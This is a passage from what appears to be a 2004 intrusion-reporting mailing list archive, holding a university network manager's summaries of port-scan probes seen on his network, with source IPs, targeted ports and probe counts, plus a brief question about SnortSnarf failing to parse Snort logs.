SYN ******S* Jul 3 00:57:23 221.202.66.25:4177 -> xxx.yyy.92.224:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4182 -> xxx.yyy.92.223:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4190 -> xxx.yyy.92.225:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4189 -> xxx.yyy.92.217:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4378 -> xxx.yyy.92.234:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4379 -> xxx.yyy.92.235:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4381 -> xxx.yyy.92.236:9898 SYN ******S* 9358 [...] 9109 Jul 3 00:56:46 221.201.144.137:1220 -> xxx.yyy.154.100:5554 SYN ******S* Jul 3 00:56:47 221.201.144.137:1641 -> xxx.yyy.154.100:1023 SYN ******S* Jul 3 00:56:46 221.201.144.137:1221 -> xxx.yyy.154.101:5554 SYN ******S* Jul 3 00:56:47 221.201.144.137:1642 -> xxx.yyy.154.101:1023 SYN ******S* Jul 3 00:56:46 221.201.144.137:1222 -> xxx.yyy.154.102:5554 SYN ******S* Jul 3 00:56:47 221.201.144.137:1643 -> xxx.yyy.154.102:1023 SYN ******S* Jul 3 00:56:46 221.201.144.137:1224 -> xxx.yyy.154.104:5554 SYN ******S* Jul 3 00:56:47 221.201.144.137:1645 -> xxx.yyy.154.104:1023 SYN ******S* [...] Jul 3 00:57:35 221.201.144.137:1597 -> xxx.yyy.174.214:9898 SYN ******S* Jul 3 00:57:35 221.201.144.137:1598 -> xxx.yyy.174.215:9898 SYN ******S* Jul 3 00:57:35 221.201.144.137:1599 -> xxx.yyy.174.216:9898 SYN ******S* Jul 3 00:57:35 221.201.144.137:1600 -> xxx.yyy.174.217:9898 SYN ******S* Jul 3 00:57:35 221.201.144.137:1601 -> xxx.yyy.174.218:9898 SYN ******S* Jul 3 00:57:35 221.201.144.137:1610 -> xxx.yyy.174.220:9898 SYN ******S* Jul 3 00:57:35 221.201.144.137:1611 -> xxx.yyy.174.221:9898 SYN ******S* Jul 3 00:57:35 221.201.144.137:1625 -> xxx.yyy.174.219:9898 SYN ******S* Jul 3 00:57:35 221.201.144.137:1626 -> xxx.yyy.174.222:9898 SYN ******S* 9076 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From hackable at gmail.com Mon Jul 5 05:11:46 2004 From: hackable at gmail.com (Hack Able) Date: Mon, 5 Jul 2004 01:11:46 -0400 Subject: [Intrusions] Snort and SnortSnarf Message-ID: Hello, SnortSnarf gives me: "unknown alert format for line" for every line it sees in a snort log (fast, full, verbose, it doesn't matter). This seems to go for any snort log file, not just ones interpreted from isc.sans.org/logs/Raw/. Anyone else having this problem? Snort 2.2.ORC1 (Build 28) SnortSnarf version v021111.1 Josh From Ken.Connelly at uni.edu Mon Jul 5 16:33:59 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Mon, 05 Jul 2004 11:33:59 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LC3N3B9T2C8YDM1V@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 4 07:59:08 68.249.210.177:3885 -> xxx.yyy.1.2:8000 SYN ******S* Jul 4 07:59:08 68.249.210.177:3889 -> xxx.yyy.1.1:8000 SYN ******S* Jul 4 07:59:08 68.249.210.177:3890 -> xxx.yyy.1.3:8000 SYN ******S* Jul 4 07:59:10 68.249.210.177:3893 -> xxx.yyy.1.4:8000 SYN ******S* Jul 4 07:59:10 68.249.210.177:3896 -> xxx.yyy.1.5:8000 SYN ******S* Jul 4 07:59:10 68.249.210.177:3897 -> xxx.yyy.1.6:8000 SYN ******S* Jul 4 07:59:10 68.249.210.177:3898 -> xxx.yyy.1.7:8000 SYN ******S* Jul 4 07:59:10 68.249.210.177:3899 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 4 13:26:05 68.249.210.177:3804 -> xxx.yyy.255.247:8000 SYN ******S* Jul 4 13:26:05 68.249.210.177:3805 -> xxx.yyy.255.248:8000 SYN ******S* Jul 4 13:26:05 68.249.210.177:3806 -> xxx.yyy.255.249:8000 SYN ******S* Jul 4 13:26:05 68.249.210.177:3808 -> xxx.yyy.255.250:8000 SYN ******S* Jul 4 13:26:05 68.249.210.177:3810 -> xxx.yyy.255.251:8000 SYN ******S* Jul 4 13:26:05 68.249.210.177:3811 -> xxx.yyy.255.252:8000 SYN ******S* Jul 4 13:26:05 68.249.210.177:3812 -> xxx.yyy.255.253:8000 SYN ******S* Jul 4 13:26:05 68.249.210.177:3813 -> xxx.yyy.255.254:8000 SYN ******S* 146640 Jul 4 16:36:42 64.53.45.117:1659 -> xxx.yyy.1.0:1433 SYN ******S* Jul 4 16:36:42 64.53.45.117:1661 -> xxx.yyy.1.1:1433 SYN ******S* Jul 4 16:36:42 64.53.45.117:1663 -> xxx.yyy.1.2:1433 SYN ******S* Jul 4 16:36:42 64.53.45.117:1665 -> xxx.yyy.1.3:1433 SYN ******S* Jul 4 16:36:42 64.53.45.117:1669 -> xxx.yyy.1.5:1433 SYN ******S* Jul 4 16:36:42 64.53.45.117:1671 -> xxx.yyy.1.6:1433 SYN ******S* Jul 4 16:36:42 64.53.45.117:1673 -> xxx.yyy.1.7:1433 SYN ******S* Jul 4 16:36:42 64.53.45.117:1675 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 4 20:25:18 64.53.45.117:4483 -> xxx.yyy.255.247:1433 SYN ******S* Jul 4 20:25:18 64.53.45.117:4488 -> xxx.yyy.255.248:1433 SYN ******S* Jul 4 20:25:19 64.53.45.117:4493 -> xxx.yyy.255.249:1433 SYN ******S* Jul 4 20:25:19 64.53.45.117:4505 -> xxx.yyy.255.250:1433 SYN ******S* Jul 4 20:25:19 64.53.45.117:4537 -> xxx.yyy.255.251:1433 SYN ******S* Jul 4 20:25:19 64.53.45.117:4543 -> xxx.yyy.255.252:1433 SYN ******S* Jul 4 20:25:19 64.53.45.117:4552 -> xxx.yyy.255.253:1433 SYN ******S* Jul 4 20:25:19 64.53.45.117:4569 -> xxx.yyy.255.254:1433 SYN ******S* 122948 Jul 4 11:22:14 129.255.65.181:2141 -> xxx.yyy.1.1:8000 SYN ******S* Jul 4 11:22:14 129.255.65.181:2142 -> xxx.yyy.1.2:8000 SYN ******S* Jul 4 11:22:14 129.255.65.181:2143 -> xxx.yyy.1.3:8000 SYN ******S* Jul 4 11:22:16 129.255.65.181:2144 -> xxx.yyy.1.4:8000 SYN ******S* Jul 4 11:22:16 129.255.65.181:2145 -> xxx.yyy.1.5:8000 SYN ******S* Jul 4 11:22:16 129.255.65.181:2146 -> xxx.yyy.1.6:8000 SYN ******S* Jul 4 11:22:16 129.255.65.181:2147 -> xxx.yyy.1.7:8000 SYN ******S* Jul 4 11:22:16 129.255.65.181:2148 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 4 12:00:55 129.255.65.181:3860 -> xxx.yyy.255.247:8000 SYN ******S* Jul 4 12:00:55 129.255.65.181:3861 -> xxx.yyy.255.248:8000 SYN ******S* Jul 4 12:00:55 129.255.65.181:3862 -> xxx.yyy.255.249:8000 SYN ******S* Jul 4 12:00:55 129.255.65.181:3863 -> xxx.yyy.255.250:8000 SYN ******S* Jul 4 12:00:55 129.255.65.181:3864 -> xxx.yyy.255.251:8000 SYN ******S* Jul 4 12:00:55 129.255.65.181:3865 -> xxx.yyy.255.252:8000 SYN ******S* Jul 4 12:00:55 129.255.65.181:3866 -> xxx.yyy.255.253:8000 SYN ******S* Jul 4 12:00:55 129.255.65.181:3867 -> xxx.yyy.255.254:8000 SYN ******S* 75549 Jul 4 20:02:28 139.142.206.101:4088 -> xxx.yyy.1.1:7575 SYN ******S* Jul 4 20:02:28 139.142.206.101:4089 -> xxx.yyy.1.2:7575 SYN ******S* Jul 4 20:02:28 139.142.206.101:4090 -> xxx.yyy.1.3:7575 SYN ******S* Jul 4 20:02:30 139.142.206.101:4091 -> xxx.yyy.1.4:7575 SYN ******S* Jul 4 20:02:30 139.142.206.101:4092 -> xxx.yyy.1.5:7575 SYN ******S* Jul 4 20:02:30 139.142.206.101:4093 -> xxx.yyy.1.6:7575 SYN ******S* Jul 4 20:02:30 139.142.206.101:4094 -> xxx.yyy.1.7:7575 SYN ******S* Jul 4 20:02:30 139.142.206.101:4095 -> xxx.yyy.1.8:7575 SYN ******S* [...] Jul 4 20:13:23 139.142.206.101:3023 -> xxx.yyy.255.201:7575 SYN ******S* Jul 4 20:13:23 139.142.206.101:3024 -> xxx.yyy.255.202:7575 SYN ******S* Jul 4 20:13:23 139.142.206.101:3017 -> xxx.yyy.255.195:7575 SYN ******S* Jul 4 20:13:23 139.142.206.101:3016 -> xxx.yyy.255.194:7575 SYN ******S* Jul 4 20:13:23 139.142.206.101:3020 -> xxx.yyy.255.198:7575 SYN ******S* Jul 4 20:13:23 139.142.206.101:3018 -> xxx.yyy.255.196:7575 SYN ******S* Jul 4 20:13:23 139.142.206.101:3019 -> xxx.yyy.255.197:7575 SYN ******S* Jul 4 20:13:24 139.142.206.101:3027 -> xxx.yyy.255.205:7575 SYN ******S* Jul 4 20:13:24 139.142.206.101:3026 -> xxx.yyy.255.204:7575 SYN ******S* 73434 Jul 4 23:25:36 62.131.129.51:64955 -> xxx.yyy.1.1:4899 SYN ******S* Jul 4 23:25:37 62.131.129.51:64955 -> xxx.yyy.1.2:4899 SYN ******S* Jul 4 23:25:36 62.131.129.51:64955 -> xxx.yyy.1.3:4899 SYN ******S* Jul 4 23:25:37 62.131.129.51:64955 -> xxx.yyy.1.4:4899 SYN ******S* Jul 4 23:25:37 62.131.129.51:64955 -> xxx.yyy.1.5:4899 SYN ******S* Jul 4 23:25:34 62.131.129.51:64955 -> xxx.yyy.1.6:4899 SYN ******S* Jul 4 23:25:37 62.131.129.51:64955 -> xxx.yyy.1.7:4899 SYN ******S* Jul 4 23:25:37 62.131.129.51:64955 -> xxx.yyy.1.8:4899 SYN ******S* [...] Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.245:4899 SYN ******S* Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.246:4899 SYN ******S* Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.247:4899 SYN ******S* Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.248:4899 SYN ******S* Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.249:4899 SYN ******S* Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.252:4899 SYN ******S* Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.253:4899 SYN ******S* Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.254:4899 SYN ******S* 72410 Jul 4 13:48:08 193.246.109.252:1576 -> xxx.yyy.1.1:1433 SYN ******S* Jul 4 13:48:08 193.246.109.252:1577 -> xxx.yyy.1.2:1433 SYN ******S* Jul 4 13:48:08 193.246.109.252:1578 -> xxx.yyy.1.3:1433 SYN ******S* Jul 4 13:48:08 193.246.109.252:1579 -> xxx.yyy.1.4:1433 SYN ******S* Jul 4 13:48:08 193.246.109.252:1580 -> xxx.yyy.1.5:1433 SYN ******S* Jul 4 13:48:08 193.246.109.252:1581 -> xxx.yyy.1.6:1433 SYN ******S* Jul 4 13:48:08 193.246.109.252:1582 -> xxx.yyy.1.7:1433 SYN ******S* Jul 4 13:48:05 193.246.109.252:1583 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 4 13:59:58 193.246.109.252:1753 -> xxx.yyy.255.173:1433 SYN ******S* Jul 4 13:59:58 193.246.109.252:1757 -> xxx.yyy.255.177:1433 SYN ******S* Jul 4 13:59:58 193.246.109.252:1750 -> xxx.yyy.255.170:1433 SYN ******S* Jul 4 13:59:58 193.246.109.252:1754 -> xxx.yyy.255.174:1433 SYN ******S* Jul 4 13:59:58 193.246.109.252:1755 -> xxx.yyy.255.175:1433 SYN ******S* Jul 4 13:59:58 193.246.109.252:1760 -> xxx.yyy.255.180:1433 SYN ******S* Jul 4 13:59:58 193.246.109.252:1762 -> xxx.yyy.255.182:1433 SYN ******S* Jul 4 13:59:58 193.246.109.252:1759 -> xxx.yyy.255.179:1433 SYN ******S* Jul 4 13:59:58 193.246.109.252:1761 -> xxx.yyy.255.181:1433 SYN ******S* 71475 Jul 4 17:32:29 82.43.182.113:3681 -> xxx.yyy.1.0:1433 SYN ******S* Jul 4 17:32:29 82.43.182.113:3685 -> xxx.yyy.1.2:1433 SYN ******S* Jul 4 17:32:29 82.43.182.113:3683 -> xxx.yyy.1.1:1433 SYN ******S* Jul 4 17:32:29 82.43.182.113:3690 -> xxx.yyy.1.3:1433 SYN ******S* Jul 4 17:32:29 82.43.182.113:3691 -> xxx.yyy.1.4:1433 SYN ******S* Jul 4 17:32:29 82.43.182.113:3705 -> xxx.yyy.1.16:1433 SYN ******S* Jul 4 17:32:29 82.43.182.113:3706 -> xxx.yyy.1.17:1433 SYN ******S* Jul 4 17:32:29 82.43.182.113:3709 -> xxx.yyy.1.18:1433 SYN ******S* [...] Jul 4 20:13:09 82.43.182.113:3218 -> xxx.yyy.180.25:1433 SYN ******S* Jul 4 20:13:09 82.43.182.113:3217 -> xxx.yyy.180.24:1433 SYN ******S* Jul 4 20:13:11 82.43.182.113:3555 -> xxx.yyy.180.26:1433 SYN ******S* Jul 4 20:13:12 82.43.182.113:3556 -> xxx.yyy.180.27:1433 SYN ******S* Jul 4 20:13:12 82.43.182.113:3558 -> xxx.yyy.180.28:1433 SYN ******S* Jul 4 20:13:12 82.43.182.113:3559 -> xxx.yyy.180.29:1433 SYN ******S* Jul 4 20:13:12 82.43.182.113:3561 -> xxx.yyy.180.30:1433 SYN ******S* Jul 4 20:13:13 82.43.182.113:3562 -> xxx.yyy.180.31:1433 SYN ******S* Jul 4 20:13:13 82.43.182.113:3576 -> xxx.yyy.180.32:1433 SYN ******S* 68830 Jul 4 15:36:27 217.231.62.55:61681 -> xxx.yyy.1.1:1433 SYN ******S* Jul 4 15:36:27 217.231.62.55:62459 -> xxx.yyy.1.2:1433 SYN ******S* Jul 4 15:36:27 217.231.62.55:63799 -> xxx.yyy.1.3:1433 SYN ******S* Jul 4 15:36:27 217.231.62.55:62519 -> xxx.yyy.1.4:1433 SYN ******S* Jul 4 15:36:24 217.231.62.55:62487 -> xxx.yyy.1.5:1433 SYN ******S* Jul 4 15:36:27 217.231.62.55:64967 -> xxx.yyy.1.6:1433 SYN ******S* Jul 4 15:36:27 217.231.62.55:62829 -> xxx.yyy.1.7:1433 SYN ******S* Jul 4 15:36:27 217.231.62.55:65117 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 4 15:59:16 217.231.62.55:64993 -> xxx.yyy.255.194:1433 SYN ******S* Jul 4 15:59:16 217.231.62.55:63353 -> xxx.yyy.255.199:1433 SYN ******S* Jul 4 15:59:16 217.231.62.55:63479 -> xxx.yyy.255.208:1433 SYN ******S* Jul 4 15:59:16 217.231.62.55:62087 -> xxx.yyy.255.209:1433 SYN ******S* Jul 4 15:59:16 217.231.62.55:64089 -> xxx.yyy.255.214:1433 SYN ******S* Jul 4 15:59:16 217.231.62.55:63657 -> xxx.yyy.255.215:1433 SYN ******S* Jul 4 15:59:16 217.231.62.55:63777 -> xxx.yyy.255.216:1433 SYN ******S* Jul 4 15:59:16 217.231.62.55:63659 -> xxx.yyy.255.217:1433 SYN ******S* 42906 Jul 4 21:49:05 82.33.67.40:1754 -> xxx.yyy.1.0:1433 SYN ******S* Jul 4 21:49:05 82.33.67.40:1756 -> xxx.yyy.1.1:1433 SYN ******S* Jul 4 21:49:05 82.33.67.40:1758 -> xxx.yyy.1.2:1433 SYN ******S* Jul 4 21:49:05 82.33.67.40:1762 -> xxx.yyy.1.4:1433 SYN ******S* Jul 4 21:49:05 82.33.67.40:1761 -> xxx.yyy.1.3:1433 SYN ******S* Jul 4 21:49:05 82.33.67.40:1763 -> xxx.yyy.1.5:1433 SYN ******S* Jul 4 21:49:05 82.33.67.40:1764 -> xxx.yyy.1.6:1433 SYN ******S* Jul 4 21:49:05 82.33.67.40:1766 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 4 23:59:57 82.33.67.40:1785 -> xxx.yyy.146.231:1433 SYN ******S* Jul 4 23:59:57 82.33.67.40:1789 -> xxx.yyy.146.232:1433 SYN ******S* Jul 4 23:59:58 82.33.67.40:1791 -> xxx.yyy.146.233:1433 SYN ******S* Jul 4 23:59:58 82.33.67.40:1796 -> xxx.yyy.146.234:1433 SYN ******S* Jul 4 23:59:58 82.33.67.40:1800 -> xxx.yyy.146.235:1433 SYN ******S* Jul 4 23:59:58 82.33.67.40:1801 -> xxx.yyy.146.236:1433 SYN ******S* Jul 4 23:59:58 82.33.67.40:1802 -> xxx.yyy.146.237:1433 SYN ******S* Jul 4 23:59:58 82.33.67.40:1746 -> xxx.yyy.146.229:1433 SYN ******S* Jul 4 23:59:58 82.33.67.40:1806 -> xxx.yyy.146.238:1433 SYN ******S* 41922 Jul 4 12:23:30 165.21.71.194:46647 -> xxx.yyy.1.0:111 SYN ******S* Jul 4 12:23:30 165.21.71.194:46648 -> xxx.yyy.1.1:111 SYN ******S* Jul 4 12:23:30 165.21.71.194:46649 -> xxx.yyy.1.2:111 SYN ******S* Jul 4 12:23:30 165.21.71.194:46652 -> xxx.yyy.1.5:111 SYN ******S* Jul 4 12:23:30 165.21.71.194:46654 -> xxx.yyy.1.7:111 SYN ******S* Jul 4 12:23:30 165.21.71.194:46660 -> xxx.yyy.1.13:111 SYN ******S* Jul 4 12:23:30 165.21.71.194:46665 -> xxx.yyy.1.18:111 SYN ******S* Jul 4 12:23:30 165.21.71.194:46666 -> xxx.yyy.1.19:111 SYN ******S* [...] Jul 4 12:34:20 165.21.71.194:46228 -> xxx.yyy.255.254:111 SYN ******S* Jul 4 12:34:20 165.21.71.194:46216 -> xxx.yyy.255.242:111 SYN ******S* Jul 4 12:34:20 165.21.71.194:46219 -> xxx.yyy.255.245:111 SYN ******S* Jul 4 12:34:20 165.21.71.194:46220 -> xxx.yyy.255.246:111 SYN ******S* Jul 4 12:34:20 165.21.71.194:46222 -> xxx.yyy.255.248:111 SYN ******S* Jul 4 12:34:20 165.21.71.194:46223 -> xxx.yyy.255.249:111 SYN ******S* Jul 4 12:34:20 165.21.71.194:46225 -> xxx.yyy.255.251:111 SYN ******S* Jul 4 12:34:20 165.21.71.194:46226 -> xxx.yyy.255.252:111 SYN ******S* Jul 4 12:34:20 165.21.71.194:46227 -> xxx.yyy.255.253:111 SYN ******S* 39426 Jul 4 20:47:06 211.110.155.221:3207 -> xxx.yyy.1.1:4899 SYN ******S* Jul 4 20:47:06 211.110.155.221:3208 -> xxx.yyy.1.2:4899 SYN ******S* Jul 4 20:47:06 211.110.155.221:3209 -> xxx.yyy.1.3:4899 SYN ******S* Jul 4 20:47:06 211.110.155.221:3210 -> xxx.yyy.1.4:4899 SYN ******S* Jul 4 20:47:06 211.110.155.221:3211 -> xxx.yyy.1.5:4899 SYN ******S* Jul 4 20:47:06 211.110.155.221:3212 -> xxx.yyy.1.6:4899 SYN ******S* Jul 4 20:47:06 211.110.155.221:3213 -> xxx.yyy.1.7:4899 SYN ******S* Jul 4 20:47:06 211.110.155.221:3215 -> xxx.yyy.1.9:4899 SYN ******S* [...] Jul 4 20:52:32 211.110.155.221:3422 -> xxx.yyy.254.138:4899 SYN ******S* Jul 4 20:52:32 211.110.155.221:3403 -> xxx.yyy.254.119:4899 SYN ******S* Jul 4 20:52:32 211.110.155.221:3419 -> xxx.yyy.254.135:4899 SYN ******S* Jul 4 20:52:32 211.110.155.221:3432 -> xxx.yyy.254.148:4899 SYN ******S* Jul 4 20:52:32 211.110.155.221:3396 -> xxx.yyy.254.113:4899 SYN ******S* Jul 4 20:52:32 211.110.155.221:3400 -> xxx.yyy.254.116:4899 SYN ******S* Jul 4 20:52:32 211.110.155.221:3416 -> xxx.yyy.254.132:4899 SYN ******S* Jul 4 20:52:32 211.110.155.221:3413 -> xxx.yyy.254.129:4899 SYN ******S* Jul 4 20:52:32 211.110.155.221:3429 -> xxx.yyy.254.145:4899 SYN ******S* 26279 Jul 4 23:05:52 218.107.144.98:3421 -> xxx.yyy.1.0:901 SYN ******S* Jul 4 23:05:52 218.107.144.98:3422 -> xxx.yyy.1.1:901 SYN ******S* Jul 4 23:05:52 218.107.144.98:3423 -> xxx.yyy.1.2:901 SYN ******S* Jul 4 23:05:52 218.107.144.98:3424 -> xxx.yyy.1.3:901 SYN ******S* Jul 4 23:05:54 218.107.144.98:3425 -> xxx.yyy.1.4:901 SYN ******S* Jul 4 23:05:54 218.107.144.98:3426 -> xxx.yyy.1.5:901 SYN ******S* Jul 4 23:05:54 218.107.144.98:3427 -> xxx.yyy.1.6:901 SYN ******S* Jul 4 23:05:54 218.107.144.98:3428 -> xxx.yyy.1.7:901 SYN ******S* [...] Jul 4 23:54:48 218.107.144.98:4532 -> xxx.yyy.111.246:901 SYN ******S* Jul 4 23:54:48 218.107.144.98:4529 -> xxx.yyy.111.243:901 SYN ******S* Jul 4 23:54:48 218.107.144.98:4539 -> xxx.yyy.111.253:901 SYN ******S* Jul 4 23:54:48 218.107.144.98:4536 -> xxx.yyy.111.250:901 SYN ******S* Jul 4 23:54:48 218.107.144.98:4533 -> xxx.yyy.111.247:901 SYN ******S* Jul 4 23:54:48 218.107.144.98:4530 -> xxx.yyy.111.244:901 SYN ******S* Jul 4 23:54:48 218.107.144.98:4540 -> xxx.yyy.111.254:901 SYN ******S* Jul 4 23:54:48 218.107.144.98:4537 -> xxx.yyy.111.251:901 SYN ******S* Jul 4 23:54:48 218.107.144.98:4534 -> xxx.yyy.111.248:901 SYN ******S* 21259 Jul 4 10:55:31 82.36.73.139:3802 -> xxx.yyy.1.11:1433 SYN ******S* Jul 4 10:55:31 82.36.73.139:3975 -> xxx.yyy.1.22:1433 SYN ******S* Jul 4 10:55:31 82.36.73.139:4039 -> xxx.yyy.1.23:1433 SYN ******S* Jul 4 10:55:31 82.36.73.139:4360 -> xxx.yyy.1.28:1433 SYN ******S* Jul 4 10:55:31 82.36.73.139:4417 -> xxx.yyy.1.30:1433 SYN ******S* Jul 4 10:55:31 82.36.73.139:4699 -> xxx.yyy.1.33:1433 SYN ******S* Jul 4 10:55:34 82.36.73.139:4796 -> xxx.yyy.1.35:1433 SYN ******S* Jul 4 10:55:31 82.36.73.139:4822 -> xxx.yyy.1.38:1433 SYN ******S* [...] Jul 4 12:09:28 82.36.73.139:4797 -> xxx.yyy.83.116:1433 SYN ******S* Jul 4 12:09:28 82.36.73.139:4811 -> xxx.yyy.83.117:1433 SYN ******S* Jul 4 12:09:28 82.36.73.139:3450 -> xxx.yyy.83.44:1433 SYN ******S* Jul 4 12:09:28 82.36.73.139:4940 -> xxx.yyy.83.118:1433 SYN ******S* Jul 4 12:09:28 82.36.73.139:4967 -> xxx.yyy.83.119:1433 SYN ******S* Jul 4 12:09:28 82.36.73.139:3006 -> xxx.yyy.83.120:1433 SYN ******S* Jul 4 12:09:28 82.36.73.139:3009 -> xxx.yyy.83.121:1433 SYN ******S* Jul 4 12:09:28 82.36.73.139:3011 -> xxx.yyy.83.122:1433 SYN ******S* Jul 4 12:09:28 82.36.73.139:3015 -> xxx.yyy.83.123:1433 SYN ******S* 18182 Jul 4 23:55:33 220.108.227.188:1486 -> xxx.yyy.214.246:5554 SYN ******S* Jul 4 23:55:34 220.108.227.188:1726 -> xxx.yyy.214.246:1023 SYN ******S* Jul 4 23:55:36 220.108.227.188:2177 -> xxx.yyy.214.246:9898 SYN ******S* Jul 4 23:55:33 220.108.227.188:1491 -> xxx.yyy.214.247:5554 SYN ******S* Jul 4 23:55:34 220.108.227.188:1733 -> xxx.yyy.214.247:1023 SYN ******S* Jul 4 23:55:36 220.108.227.188:2180 -> xxx.yyy.214.247:9898 SYN ******S* Jul 4 23:55:33 220.108.227.188:1502 -> xxx.yyy.214.249:5554 SYN ******S* Jul 4 23:55:34 220.108.227.188:1742 -> xxx.yyy.214.249:1023 SYN ******S* [...] Jul 4 23:57:05 220.108.227.188:4730 -> xxx.yyy.235.103:9898 SYN ******S* Jul 4 23:57:05 220.108.227.188:4782 -> xxx.yyy.235.110:9898 SYN ******S* Jul 4 23:57:05 220.108.227.188:4800 -> xxx.yyy.235.106:9898 SYN ******S* Jul 4 23:57:05 220.108.227.188:4801 -> xxx.yyy.235.107:9898 SYN ******S* Jul 4 23:57:05 220.108.227.188:4799 -> xxx.yyy.235.105:9898 SYN ******S* Jul 4 23:57:05 220.108.227.188:4802 -> xxx.yyy.235.108:9898 SYN ******S* Jul 4 23:57:05 220.108.227.188:4804 -> xxx.yyy.235.109:9898 SYN ******S* Jul 4 23:57:05 220.108.227.188:4820 -> xxx.yyy.235.111:9898 SYN ******S* Jul 4 23:57:05 220.108.227.188:4854 -> xxx.yyy.235.112:9898 SYN ******S* 15079 Jul 4 00:56:23 61.138.108.243:3843 -> xxx.yyy.174.2:5554 SYN ******S* Jul 4 00:56:24 61.138.108.243:4314 -> xxx.yyy.174.2:1023 SYN ******S* Jul 4 00:56:26 61.138.108.243:1390 -> xxx.yyy.174.2:9898 SYN ******S* Jul 4 00:56:23 61.138.108.243:3876 -> xxx.yyy.174.3:5554 SYN ******S* Jul 4 00:56:24 61.138.108.243:4325 -> xxx.yyy.174.3:1023 SYN ******S* Jul 4 00:56:26 61.138.108.243:1404 -> xxx.yyy.174.3:9898 SYN ******S* Jul 4 00:56:23 61.138.108.243:3889 -> xxx.yyy.174.4:5554 SYN ******S* Jul 4 00:56:24 61.138.108.243:4330 -> xxx.yyy.174.4:1023 SYN ******S* [...] Jul 4 00:58:29 61.138.108.243:3433 -> xxx.yyy.194.85:9898 SYN ******S* Jul 4 00:58:29 61.138.108.243:3428 -> xxx.yyy.194.72:9898 SYN ******S* Jul 4 00:58:29 61.138.108.243:3425 -> xxx.yyy.194.70:9898 SYN ******S* Jul 4 00:58:29 61.138.108.243:3424 -> xxx.yyy.194.69:9898 SYN ******S* Jul 4 00:58:29 61.138.108.243:3401 -> xxx.yyy.194.63:9898 SYN ******S* Jul 4 00:58:29 61.138.108.243:3405 -> xxx.yyy.194.64:9898 SYN ******S* Jul 4 00:58:29 61.138.108.243:3413 -> xxx.yyy.194.66:9898 SYN ******S* Jul 4 00:58:29 61.138.108.243:3404 -> xxx.yyy.194.65:9898 SYN ******S* Jul 4 00:58:29 61.138.108.243:3399 -> xxx.yyy.194.62:9898 SYN ******S* 13743 Jul 4 23:56:10 60.34.16.192:2040 -> xxx.yyy.174.2:5554 SYN ******S* Jul 4 23:56:11 60.34.16.192:2768 -> xxx.yyy.174.2:1023 SYN ******S* Jul 4 23:56:13 60.34.16.192:4657 -> xxx.yyy.174.2:9898 SYN ******S* Jul 4 23:56:10 60.34.16.192:2041 -> xxx.yyy.174.3:5554 SYN ******S* Jul 4 23:56:11 60.34.16.192:2749 -> xxx.yyy.174.3:1023 SYN ******S* Jul 4 23:56:13 60.34.16.192:4600 -> xxx.yyy.174.3:9898 SYN ******S* Jul 4 23:56:10 60.34.16.192:2059 -> xxx.yyy.174.4:5554 SYN ******S* Jul 4 23:56:11 60.34.16.192:2796 -> xxx.yyy.174.4:1023 SYN ******S* [...] Jul 4 23:56:54 60.34.16.192:3152 -> xxx.yyy.194.122:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3153 -> xxx.yyy.194.114:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3158 -> xxx.yyy.194.100:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3162 -> xxx.yyy.194.112:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3159 -> xxx.yyy.194.108:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3160 -> xxx.yyy.194.109:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3172 -> xxx.yyy.194.116:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3173 -> xxx.yyy.194.118:9898 SYN ******S* 13613 Jul 4 00:56:58 218.61.144.160:1986 -> xxx.yyy.154.100:5554 SYN ******S* Jul 4 00:56:59 218.61.144.160:2620 -> xxx.yyy.154.100:1023 SYN ******S* Jul 4 00:57:01 218.61.144.160:3820 -> xxx.yyy.154.100:9898 SYN ******S* Jul 4 00:56:58 218.61.144.160:1988 -> xxx.yyy.154.102:5554 SYN ******S* Jul 4 00:56:59 218.61.144.160:2622 -> xxx.yyy.154.102:1023 SYN ******S* Jul 4 00:57:01 218.61.144.160:3824 -> xxx.yyy.154.102:9898 SYN ******S* Jul 4 00:56:58 218.61.144.160:1987 -> xxx.yyy.154.101:5554 SYN ******S* Jul 4 00:56:59 218.61.144.160:2621 -> xxx.yyy.154.101:1023 SYN ******S* [...] Jul 4 00:57:40 218.61.144.160:2947 -> xxx.yyy.174.162:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2952 -> xxx.yyy.174.163:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2953 -> xxx.yyy.174.164:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2954 -> xxx.yyy.174.165:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2957 -> xxx.yyy.174.166:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2958 -> xxx.yyy.174.167:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2959 -> xxx.yyy.174.168:9898 SYN 